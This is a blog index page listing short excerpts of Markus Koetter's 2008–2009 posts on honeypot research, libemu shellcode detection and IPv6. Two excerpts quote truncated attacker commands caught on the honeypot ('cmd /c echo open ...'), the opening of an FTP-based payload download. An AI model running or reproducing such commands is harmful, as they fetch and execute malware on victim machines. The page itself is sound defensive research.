Markus Koetter

August 11, 2009

Iteolih: Miles and More

We got a new milestone due: 10.08.2009 thread-pool works stream recording works shellcode detection using libemu works shellcode emulation using libemu works compiles on linux&openbsd An […]
July 26, 2009

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this: WinExec("cmd /c echo open 4871 > […]
July 21, 2009

Iteolih: If you can’t touch it …

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.cmd /c echo open 4356 > i&echo […]
June 5, 2009

Iteolih: Is this worth your time?

Hello, due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are […]
May 24, 2009

Iteolih: Python Benchmark

As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The ‘testsuite’ is a c core […]
December 10, 2008

libemu: Detecting selfencrypted shellcode in network streams

As libemu had it’s second release (0.2.0) lately, I’ll try to introduce it to the audience who did not hear about it yet. libemu is a […]
October 20, 2008

ipv6 local-link scope is a mess

I’ve been looking on ipv6 lately, and even though I got a global /64 for free from, I’m not that amused about ipv6 yet. ipv6 […]